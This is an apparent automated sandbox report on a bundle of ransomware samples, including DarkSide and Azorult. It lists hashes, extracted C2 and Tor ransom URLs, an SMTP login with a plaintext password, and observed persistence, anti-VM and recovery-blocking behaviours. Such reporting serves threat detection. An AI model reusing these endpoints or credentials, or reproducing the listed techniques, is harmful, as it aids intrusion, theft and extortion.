Analysis
-
max time kernel
165s -
max time network
512s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
28-10-2024 16:33
Static task
static1
Behavioral task
behavioral1
Sample
RNSM00416.7z
Resource
win10v2004-20241007-en
General
-
Target
RNSM00416.7z
-
Size
63.5MB
-
MD5
9ad7acd12fdb6f4987085f017b1ed245
-
SHA1
3886b70681b87a8121485ae50885bc14b0f4651c
-
SHA256
9d2dc1dd809d37660de03488b05b4705e23b8cb04b9fd1cc1eb8c50943d8b9fb
-
SHA512
8364d22160cc3374fb912d59ce5cea2056b2f530e5693f636d3f30211b544e135f3b7eb5d59d76b955b390009d3203c4b771bbc0c295917c32e4402fed3a18eb
-
SSDEEP
1572864:NO+mdGZyLbosBDD8TFs9eC1O5qMQCBp2ZB22mi:s7boW85IP10qNyrRi
Malware Config
Extracted
Protocol: smtp- Host:
smtp.gmail.com - Port:
587 - Username:
[email protected] - Password:
21011997
Extracted
azorult
http://javiermar2.temp.swtest.ru/index.php
Extracted
C:\Users\Admin\README.f875121f.TXT
darkside
http://darksidedxcftmqa.onion/polifilm/AWeu5Sv7zTTCTjZD8YkgoPRznfE5r7G-vbsXok9EvfiaNL_eDwRlgRMruMHisnEF
http://darksidfqzcuhtk2.onion/2AHUVJ3VGS97NUG5J5EYMQM5PJO77V9V0GDT3UYIJGFZUTOQRLUX593CQ2EZ2ZEH
Extracted
C:\Program Files\Instructions for recovery FILES.TXT
Extracted
C:\Users\Admin\3D Objects\HOW-TO-DECRYPT-kgkq9.txt
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
Azorult family
-
DarkSide
Targeted ransomware first seen in August 2020. Operators steal data to use as leverage.
-
Darkside family
-
ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
-
Modifies firewall policy service 3 TTPs 4 IoCs
Processes:
tpvpyme.exedescription ioc Process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List tpvpyme.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile tpvpyme.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications tpvpyme.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\tpvpyme.exe = "C:\\Users\\Admin\\Desktop\\00416\\tpvpyme.exe" tpvpyme.exe -
Modifies visiblity of hidden/system files in Explorer 2 TTPs 1 IoCs
Processes:
tpvpyme.exedescription ioc Process Set value (int) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "2" tpvpyme.exe -
Modiloader family
-
Processes:
resource yara_rule behavioral1/files/0x0007000000023ca7-16858.dat cryptone -
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
Processes:
VHO-Trojan-Ransom.Win32.Blocker.gen-fd2fffd46e1c59e974719fa411cebe4f9e0f2177d489a93158ece32eb96afe28.exedescription ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ VHO-Trojan-Ransom.Win32.Blocker.gen-fd2fffd46e1c59e974719fa411cebe4f9e0f2177d489a93158ece32eb96afe28.exe -
ModiLoader Second Stage 1 IoCs
Processes:
resource yara_rule behavioral1/memory/3952-7752-0x0000000000400000-0x0000000000CD1000-memory.dmp modiloader_stage2 -
Renames multiple (213) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Renames multiple (3650) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
Sets service image path in registry 2 TTPs 2 IoCs
Processes:
SUPERAntiSpywarePro.exedescription ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SASDIFSV\ImagePath = "\\??\\C:\\Program Files\\SUPERAntiSpyware\\SASDIFSV64.SYS" SUPERAntiSpywarePro.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SASKUTIL\ImagePath = "\\??\\C:\\Program Files\\SUPERAntiSpyware\\SASKUTIL64.SYS" SUPERAntiSpywarePro.exe -
Checks computer location settings 2 TTPs 12 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
Install.exeTrojan-Ransom.Win32.Purga.oq-6eb879f5aaf5a72f5c2856aa612d03f5ca0a44fce9ede6968ee5f464829d4802.exeWScript.exe$TMP$001.exeHEUR-Trojan-Ransom.Win32.Gen.gen-e307536fa19eea83707d63b6fd4c94826655c4a019df76b43743f475fbd81463.exeTrojan-Ransom.Win32.Blocker.iejl-c5e89f11b69c341b2747cea88413225465ab655fe2b212a7a5006e5dd1eb345f.exetpvpyme.exeVHO-Trojan-Ransom.Win32.PornoBlocker.gen-7882a3a461e5ab50fc62584efdc1dd4c2beb8c7af9ea7ee98085b68320ebf7fc.exeTrojan-Ransom.Win32.Purga.oq-6eb879f5aaf5a72f5c2856aa612d03f5ca0a44fce9ede6968ee5f464829d4802.exeTrojan-Ransom.Win32.Darkside.k-17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.exeHEUR-Trojan-Ransom.Win32.Blocker.vho-fad399b0261e4b9603a827c6edba8297ec5a1c8dae0f2a9a24704f73c743515d.exeadd.exedescription ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation Install.exe Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation Trojan-Ransom.Win32.Purga.oq-6eb879f5aaf5a72f5c2856aa612d03f5ca0a44fce9ede6968ee5f464829d4802.exe Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation $TMP$001.exe Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation HEUR-Trojan-Ransom.Win32.Gen.gen-e307536fa19eea83707d63b6fd4c94826655c4a019df76b43743f475fbd81463.exe Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation Trojan-Ransom.Win32.Blocker.iejl-c5e89f11b69c341b2747cea88413225465ab655fe2b212a7a5006e5dd1eb345f.exe Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation tpvpyme.exe Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation VHO-Trojan-Ransom.Win32.PornoBlocker.gen-7882a3a461e5ab50fc62584efdc1dd4c2beb8c7af9ea7ee98085b68320ebf7fc.exe Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation Trojan-Ransom.Win32.Purga.oq-6eb879f5aaf5a72f5c2856aa612d03f5ca0a44fce9ede6968ee5f464829d4802.exe Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation Trojan-Ransom.Win32.Darkside.k-17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.exe Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation HEUR-Trojan-Ransom.Win32.Blocker.vho-fad399b0261e4b9603a827c6edba8297ec5a1c8dae0f2a9a24704f73c743515d.exe Key value queried \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\International\Geo\Nation add.exe -
Credentials from Password Stores: Windows Credential Manager 1 TTPs
Suspicious access to Credentials History.
-
Event Triggered Execution: Component Object Model Hijacking 1 TTPs
Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.
-
Executes dropped EXE 34 IoCs
Processes:
HEUR-Trojan-Ransom.MSIL.Generic-1b46e9135a7abba77ef12257fd426d59318b73bee61b01a7d880123ec0a78557.exeHEUR-Trojan-Ransom.Win32.Blocker.gen-0aeebcfcadc1e2f2f95b3bbc8d1edf5dad6f10fcfdae0cadc8672c238621112e.exeHEUR-Trojan-Ransom.Win32.Blocker.vho-fad399b0261e4b9603a827c6edba8297ec5a1c8dae0f2a9a24704f73c743515d.exeHEUR-Trojan-Ransom.Win32.Encoder.gen-2033f858574da1fa877ecac8e84be8fa27fb2d352f8254f8187cd305993bebdf.exeHEUR-Trojan-Ransom.Win32.Gen.gen-e307536fa19eea83707d63b6fd4c94826655c4a019df76b43743f475fbd81463.exeHEUR-Trojan-Ransom.Win32.Generic-c082e6069bcaefeb04a9e3cb1c5478b7d5df82b07534367e2081e33207f61138.exeHEUR-Trojan-Ransom.Win32.PornoAsset.gen-7654394bbdcc63d7ce5b825a87370e66d098e195af7b40abab5188744f94ac6e.exetpvpyme.exeTrojan-Ransom.Win32.Blocker.iejl-c5e89f11b69c341b2747cea88413225465ab655fe2b212a7a5006e5dd1eb345f.exeTrojan-Ransom.Win32.Blocker.lckf-19205dc779799f71ecdff8dd7ec4a2a9106540d143a713e2c847e1f58266b0f3.exeTrojan-Ransom.Win32.Blocker.mtgl-49d359520d74f3752bb9955bb9582f4089e3a08a38eb39776d7f8a190bf14950.exeTrojan-Ransom.Win32.Cryptoff.bov-0ca614ac19a208d45527b341b495140fa5f9993748db6b2afda3dda7e9a8c602.exeTrojan-Ransom.Win32.Darkside.k-17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.exeTrojan-Ransom.Win32.Gen.nse-25adae704fe3ee1591e751d24dfff1b17f834fac79fd9f7a7495b4753f2a1006.exeTrojan-Ransom.Win32.Gen.zjq-7727333265591e7b27b575eacbf9d55dd5967b6c1ad6d9bb9255d158957294ad.exeInstall.exeTrojan-Ransom.Win32.Hades.g-0dfcf4d5f66310de87c2e422d7804e66279fe3e3cd6a27723225aecf214e9b00.exeTrojan-Ransom.Win32.Purga.oq-6eb879f5aaf5a72f5c2856aa612d03f5ca0a44fce9ede6968ee5f464829d4802.exeadd.exeSUPERAntiSpywarePro.exeUDS-Trojan-Ransom.Win32.Foreign-5b0e1cb6a13ca4074731d087948d4b59c670c33c857fdf29472080f50453dbef.exeVHO-Trojan-Ransom.Win32.Blocker.gen-fd2fffd46e1c59e974719fa411cebe4f9e0f2177d489a93158ece32eb96afe28.exeiexplorer.exeVHO-Trojan-Ransom.Win32.Convagent.gen-a6955b8539e4bf51bc4c0b9dd9c7c410cf1b8892741401409ec2c685db104ccc.exeVHO-Trojan-Ransom.Win32.Foreign.gen-9f43b7e551446a58daff45fbbf75f884f0b5b16c095f17c92bb5e27344556784.exeSASCORE64.EXEVHO-Trojan-Ransom.Win32.Gen.gen-1d7671a21350324eff8fe60dd3f02e984097a9d54266492c0409a5ffd8c555cc.exeTrojan-Ransom.Win32.Purga.oq-6eb879f5aaf5a72f5c2856aa612d03f5ca0a44fce9ede6968ee5f464829d4802.exeSASCORE64.EXEVHO-Trojan-Ransom.Win32.PornoBlocker.gen-7882a3a461e5ab50fc62584efdc1dd4c2beb8c7af9ea7ee98085b68320ebf7fc.exeSUPERAntiSpyware.exeosk.exe$TMP$001.exewinupas.exepid Process 4688 HEUR-Trojan-Ransom.MSIL.Generic-1b46e9135a7abba77ef12257fd426d59318b73bee61b01a7d880123ec0a78557.exe 1872 HEUR-Trojan-Ransom.Win32.Blocker.gen-0aeebcfcadc1e2f2f95b3bbc8d1edf5dad6f10fcfdae0cadc8672c238621112e.exe 3352 HEUR-Trojan-Ransom.Win32.Blocker.vho-fad399b0261e4b9603a827c6edba8297ec5a1c8dae0f2a9a24704f73c743515d.exe 2412 HEUR-Trojan-Ransom.Win32.Encoder.gen-2033f858574da1fa877ecac8e84be8fa27fb2d352f8254f8187cd305993bebdf.exe 3084 HEUR-Trojan-Ransom.Win32.Gen.gen-e307536fa19eea83707d63b6fd4c94826655c4a019df76b43743f475fbd81463.exe 3512 HEUR-Trojan-Ransom.Win32.Generic-c082e6069bcaefeb04a9e3cb1c5478b7d5df82b07534367e2081e33207f61138.exe 5156 HEUR-Trojan-Ransom.Win32.PornoAsset.gen-7654394bbdcc63d7ce5b825a87370e66d098e195af7b40abab5188744f94ac6e.exe 1676 tpvpyme.exe 1760 Trojan-Ransom.Win32.Blocker.iejl-c5e89f11b69c341b2747cea88413225465ab655fe2b212a7a5006e5dd1eb345f.exe 6892 Trojan-Ransom.Win32.Blocker.lckf-19205dc779799f71ecdff8dd7ec4a2a9106540d143a713e2c847e1f58266b0f3.exe 3952 Trojan-Ransom.Win32.Blocker.mtgl-49d359520d74f3752bb9955bb9582f4089e3a08a38eb39776d7f8a190bf14950.exe 5388 Trojan-Ransom.Win32.Cryptoff.bov-0ca614ac19a208d45527b341b495140fa5f9993748db6b2afda3dda7e9a8c602.exe 6608 Trojan-Ransom.Win32.Darkside.k-17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.exe 5584 Trojan-Ransom.Win32.Gen.nse-25adae704fe3ee1591e751d24dfff1b17f834fac79fd9f7a7495b4753f2a1006.exe 5224 Trojan-Ransom.Win32.Gen.zjq-7727333265591e7b27b575eacbf9d55dd5967b6c1ad6d9bb9255d158957294ad.exe 6800 Install.exe 5620 Trojan-Ransom.Win32.Hades.g-0dfcf4d5f66310de87c2e422d7804e66279fe3e3cd6a27723225aecf214e9b00.exe 1428 Trojan-Ransom.Win32.Purga.oq-6eb879f5aaf5a72f5c2856aa612d03f5ca0a44fce9ede6968ee5f464829d4802.exe 9096 add.exe 7324 SUPERAntiSpywarePro.exe 5060 UDS-Trojan-Ransom.Win32.Foreign-5b0e1cb6a13ca4074731d087948d4b59c670c33c857fdf29472080f50453dbef.exe 9012 VHO-Trojan-Ransom.Win32.Blocker.gen-fd2fffd46e1c59e974719fa411cebe4f9e0f2177d489a93158ece32eb96afe28.exe 1452 iexplorer.exe 5412 VHO-Trojan-Ransom.Win32.Convagent.gen-a6955b8539e4bf51bc4c0b9dd9c7c410cf1b8892741401409ec2c685db104ccc.exe 5576 VHO-Trojan-Ransom.Win32.Foreign.gen-9f43b7e551446a58daff45fbbf75f884f0b5b16c095f17c92bb5e27344556784.exe 1704 SASCORE64.EXE 2796 VHO-Trojan-Ransom.Win32.Gen.gen-1d7671a21350324eff8fe60dd3f02e984097a9d54266492c0409a5ffd8c555cc.exe 6508 Trojan-Ransom.Win32.Purga.oq-6eb879f5aaf5a72f5c2856aa612d03f5ca0a44fce9ede6968ee5f464829d4802.exe 7600 SASCORE64.EXE 5676 VHO-Trojan-Ransom.Win32.PornoBlocker.gen-7882a3a461e5ab50fc62584efdc1dd4c2beb8c7af9ea7ee98085b68320ebf7fc.exe 4636 SUPERAntiSpyware.exe 6316 osk.exe 4356 $TMP$001.exe 8272 winupas.exe -
Identifies Wine through registry keys 2 TTPs 1 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
Processes:
VHO-Trojan-Ransom.Win32.Blocker.gen-fd2fffd46e1c59e974719fa411cebe4f9e0f2177d489a93158ece32eb96afe28.exedescription ioc Process Key opened \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Wine VHO-Trojan-Ransom.Win32.Blocker.gen-fd2fffd46e1c59e974719fa411cebe4f9e0f2177d489a93158ece32eb96afe28.exe -
Impair Defenses: Safe Mode Boot 1 TTPs 7 IoCs
Processes:
SASCORE64.EXETrojan-Ransom.Win32.Blocker.mtgl-49d359520d74f3752bb9955bb9582f4089e3a08a38eb39776d7f8a190bf14950.exedescription ioc Process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\control\safeboot\minimal\!SASCORE SASCORE64.EXE Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\UserManager Trojan-Ransom.Win32.Blocker.mtgl-49d359520d74f3752bb9955bb9582f4089e3a08a38eb39776d7f8a190bf14950.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\SerCx2.sys Trojan-Ransom.Win32.Blocker.mtgl-49d359520d74f3752bb9955bb9582f4089e3a08a38eb39776d7f8a190bf14950.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\ProfSvc Trojan-Ransom.Win32.Blocker.mtgl-49d359520d74f3752bb9955bb9582f4089e3a08a38eb39776d7f8a190bf14950.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\Power Trojan-Ransom.Win32.Blocker.mtgl-49d359520d74f3752bb9955bb9582f4089e3a08a38eb39776d7f8a190bf14950.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\iai2c.sys Trojan-Ransom.Win32.Blocker.mtgl-49d359520d74f3752bb9955bb9582f4089e3a08a38eb39776d7f8a190bf14950.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\SafeBoot\Minimal\CBDHSvc Trojan-Ransom.Win32.Blocker.mtgl-49d359520d74f3752bb9955bb9582f4089e3a08a38eb39776d7f8a190bf14950.exe -
Loads dropped DLL 5 IoCs
Processes:
SUPERAntiSpywarePro.exeREGSVR32.EXESUPERAntiSpyware.exepid Process 7324 SUPERAntiSpywarePro.exe 7324 SUPERAntiSpywarePro.exe 9020 REGSVR32.EXE 7324 SUPERAntiSpywarePro.exe 4636 SUPERAntiSpyware.exe -
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule behavioral1/files/0x0007000000023ca2-7739.dat vmprotect behavioral1/memory/3952-7752-0x0000000000400000-0x0000000000CD1000-memory.dmp vmprotect -
Adds Run key to start application 2 TTPs 10 IoCs
Processes:
HEUR-Trojan-Ransom.MSIL.Generic-1b46e9135a7abba77ef12257fd426d59318b73bee61b01a7d880123ec0a78557.exeTrojan-Ransom.Win32.Blocker.mtgl-49d359520d74f3752bb9955bb9582f4089e3a08a38eb39776d7f8a190bf14950.exeSUPERAntiSpyware.exemshta.exereg.exeHEUR-Trojan-Ransom.Win32.Gen.gen-e307536fa19eea83707d63b6fd4c94826655c4a019df76b43743f475fbd81463.exeHEUR-Trojan-Ransom.Win32.Encoder.gen-2033f858574da1fa877ecac8e84be8fa27fb2d352f8254f8187cd305993bebdf.exeTrojan-Ransom.Win32.Cryptoff.bov-0ca614ac19a208d45527b341b495140fa5f9993748db6b2afda3dda7e9a8c602.exeiexplorer.exetpvpyme.exedescription ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\wind = "C:\\Users\\Admin\\Desktop\\00416\\HEUR-Trojan-Ransom.MSIL.Generic-1b46e9135a7abba77ef12257fd426d59318b73bee61b01a7d880123ec0a78557.exe" HEUR-Trojan-Ransom.MSIL.Generic-1b46e9135a7abba77ef12257fd426d59318b73bee61b01a7d880123ec0a78557.exe Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Trojan-Ransom.Win32.Blocker.mtgl-49d359520d74f3752bb9955bb9582f4089e3a08a38eb39776d7f8a190bf14950.exe = "C:\\Users\\Admin\\Desktop\\00416\\Trojan-Ransom.Win32.Blocker.mtgl-49d359520d74f3752bb9955bb9582f4089e3a08a38eb39776d7f8a190bf14950.exe" Trojan-Ransom.Win32.Blocker.mtgl-49d359520d74f3752bb9955bb9582f4089e3a08a38eb39776d7f8a190bf14950.exe Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SUPERAntiSpyware = "C:\\Program Files\\SUPERAntiSpyware\\SUPERAntiSpyware.exe" SUPERAntiSpyware.exe Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\NCddWiA = "C:\\Users\\Admin\\AppData\\Roaming\\osk.exe" mshta.exe Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows Update Assistant = "\"C:\\Users\\Admin\\AppData\\Roaming\\winupas.exe\" *" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Meme Cryptor = "C:\\Users\\Admin\\AppData\\Local\\Temp\\KBYRTQUICJRCXNB.exe" HEUR-Trojan-Ransom.Win32.Gen.gen-e307536fa19eea83707d63b6fd4c94826655c4a019df76b43743f475fbd81463.exe Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Criptor = "C:\\Users\\Admin\\Desktop\\00416\\HEUR-Trojan-Ransom.Win32.Encoder.gen-2033f858574da1fa877ecac8e84be8fa27fb2d352f8254f8187cd305993bebdf.exe" HEUR-Trojan-Ransom.Win32.Encoder.gen-2033f858574da1fa877ecac8e84be8fa27fb2d352f8254f8187cd305993bebdf.exe Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cvfkfyflvy = "C:\\Users\\Admin\\Desktop\\00416\\Trojan-Ransom.Win32.Cryptoff.bov-0ca614ac19a208d45527b341b495140fa5f9993748db6b2afda3dda7e9a8c602.exe" Trojan-Ransom.Win32.Cryptoff.bov-0ca614ac19a208d45527b341b495140fa5f9993748db6b2afda3dda7e9a8c602.exe Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ = "C:\\Users\\Admin\\AppData\\Roaming\\iexplorer.exe" iexplorer.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\tpvpyme.exe = "C:\\Users\\Admin\\Desktop\\00416\\tpvpyme.exe" tpvpyme.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops desktop.ini file(s) 27 IoCs
Processes:
HEUR-Trojan-Ransom.Win32.Gen.gen-e307536fa19eea83707d63b6fd4c94826655c4a019df76b43743f475fbd81463.exedescription ioc Process File opened for modification C:\Users\Admin\Downloads\desktop.ini HEUR-Trojan-Ransom.Win32.Gen.gen-e307536fa19eea83707d63b6fd4c94826655c4a019df76b43743f475fbd81463.exe File opened for modification C:\Users\Admin\Favorites\desktop.ini HEUR-Trojan-Ransom.Win32.Gen.gen-e307536fa19eea83707d63b6fd4c94826655c4a019df76b43743f475fbd81463.exe File opened for modification C:\Users\Public\Libraries\desktop.ini HEUR-Trojan-Ransom.Win32.Gen.gen-e307536fa19eea83707d63b6fd4c94826655c4a019df76b43743f475fbd81463.exe File opened for modification C:\Users\Admin\Documents\desktop.ini HEUR-Trojan-Ransom.Win32.Gen.gen-e307536fa19eea83707d63b6fd4c94826655c4a019df76b43743f475fbd81463.exe File opened for modification C:\Users\Admin\Pictures\Camera Roll\desktop.ini HEUR-Trojan-Ransom.Win32.Gen.gen-e307536fa19eea83707d63b6fd4c94826655c4a019df76b43743f475fbd81463.exe File opened for modification C:\Users\Admin\Links\desktop.ini HEUR-Trojan-Ransom.Win32.Gen.gen-e307536fa19eea83707d63b6fd4c94826655c4a019df76b43743f475fbd81463.exe File opened for modification C:\Users\Admin\Music\desktop.ini HEUR-Trojan-Ransom.Win32.Gen.gen-e307536fa19eea83707d63b6fd4c94826655c4a019df76b43743f475fbd81463.exe File opened for modification C:\Users\Public\desktop.ini HEUR-Trojan-Ransom.Win32.Gen.gen-e307536fa19eea83707d63b6fd4c94826655c4a019df76b43743f475fbd81463.exe File opened for modification C:\Users\Admin\Desktop\desktop.ini HEUR-Trojan-Ransom.Win32.Gen.gen-e307536fa19eea83707d63b6fd4c94826655c4a019df76b43743f475fbd81463.exe File opened for modification C:\Users\Admin\Favorites\Links\desktop.ini HEUR-Trojan-Ransom.Win32.Gen.gen-e307536fa19eea83707d63b6fd4c94826655c4a019df76b43743f475fbd81463.exe File opened for modification C:\Users\Admin\3D Objects\desktop.ini HEUR-Trojan-Ransom.Win32.Gen.gen-e307536fa19eea83707d63b6fd4c94826655c4a019df76b43743f475fbd81463.exe File opened for modification C:\Program Files\desktop.ini HEUR-Trojan-Ransom.Win32.Gen.gen-e307536fa19eea83707d63b6fd4c94826655c4a019df76b43743f475fbd81463.exe File opened for modification C:\Users\Public\Documents\desktop.ini HEUR-Trojan-Ransom.Win32.Gen.gen-e307536fa19eea83707d63b6fd4c94826655c4a019df76b43743f475fbd81463.exe File opened for modification C:\Users\Public\Videos\desktop.ini HEUR-Trojan-Ransom.Win32.Gen.gen-e307536fa19eea83707d63b6fd4c94826655c4a019df76b43743f475fbd81463.exe File opened for modification C:\Users\Admin\OneDrive\desktop.ini HEUR-Trojan-Ransom.Win32.Gen.gen-e307536fa19eea83707d63b6fd4c94826655c4a019df76b43743f475fbd81463.exe File opened for modification C:\Users\Admin\Videos\desktop.ini HEUR-Trojan-Ransom.Win32.Gen.gen-e307536fa19eea83707d63b6fd4c94826655c4a019df76b43743f475fbd81463.exe File opened for modification C:\Users\Public\Downloads\desktop.ini HEUR-Trojan-Ransom.Win32.Gen.gen-e307536fa19eea83707d63b6fd4c94826655c4a019df76b43743f475fbd81463.exe File opened for modification C:\Users\Public\Pictures\desktop.ini HEUR-Trojan-Ransom.Win32.Gen.gen-e307536fa19eea83707d63b6fd4c94826655c4a019df76b43743f475fbd81463.exe File opened for modification C:\Program Files (x86)\desktop.ini HEUR-Trojan-Ransom.Win32.Gen.gen-e307536fa19eea83707d63b6fd4c94826655c4a019df76b43743f475fbd81463.exe File opened for modification C:\Users\Public\Desktop\desktop.ini HEUR-Trojan-Ransom.Win32.Gen.gen-e307536fa19eea83707d63b6fd4c94826655c4a019df76b43743f475fbd81463.exe File opened for modification C:\Users\Public\Music\desktop.ini HEUR-Trojan-Ransom.Win32.Gen.gen-e307536fa19eea83707d63b6fd4c94826655c4a019df76b43743f475fbd81463.exe File opened for modification C:\Users\Admin\Contacts\desktop.ini HEUR-Trojan-Ransom.Win32.Gen.gen-e307536fa19eea83707d63b6fd4c94826655c4a019df76b43743f475fbd81463.exe File opened for modification C:\Users\Admin\Saved Games\desktop.ini HEUR-Trojan-Ransom.Win32.Gen.gen-e307536fa19eea83707d63b6fd4c94826655c4a019df76b43743f475fbd81463.exe File opened for modification C:\Users\Admin\Pictures\desktop.ini HEUR-Trojan-Ransom.Win32.Gen.gen-e307536fa19eea83707d63b6fd4c94826655c4a019df76b43743f475fbd81463.exe File opened for modification C:\Users\Admin\Pictures\Saved Pictures\desktop.ini HEUR-Trojan-Ransom.Win32.Gen.gen-e307536fa19eea83707d63b6fd4c94826655c4a019df76b43743f475fbd81463.exe File opened for modification C:\Users\Public\AccountPictures\desktop.ini HEUR-Trojan-Ransom.Win32.Gen.gen-e307536fa19eea83707d63b6fd4c94826655c4a019df76b43743f475fbd81463.exe File opened for modification C:\Users\Admin\Searches\desktop.ini HEUR-Trojan-Ransom.Win32.Gen.gen-e307536fa19eea83707d63b6fd4c94826655c4a019df76b43743f475fbd81463.exe -
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Maps connected drives based on registry 3 TTPs 2 IoCs
Disk information is often read in order to detect sandboxing environments.
Processes:
osk.exedescription ioc Process Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 osk.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum osk.exe -
Uses Tor communications 1 TTPs
Malware can proxy its traffic through Tor for more anonymity.
-
AutoIT Executable 2 IoCs
AutoIT scripts compiled to PE executables.
Processes:
resource yara_rule behavioral1/memory/5576-17524-0x0000000000400000-0x00000000004C4000-memory.dmp autoit_exe behavioral1/memory/5576-17698-0x0000000000400000-0x00000000004C4000-memory.dmp autoit_exe -
Sets desktop wallpaper using registry 2 TTPs 2 IoCs
Processes:
Trojan-Ransom.Win32.Darkside.k-17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.exedescription ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\Desktop\WallPaper = "C:\\ProgramData\\f875121f.BMP" Trojan-Ransom.Win32.Darkside.k-17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.exe Set value (str) \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\f875121f.BMP" Trojan-Ransom.Win32.Darkside.k-17139a10fd226d01738fe9323918614aa913b2a50e1a516e95cced93fa151c61.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
Processes:
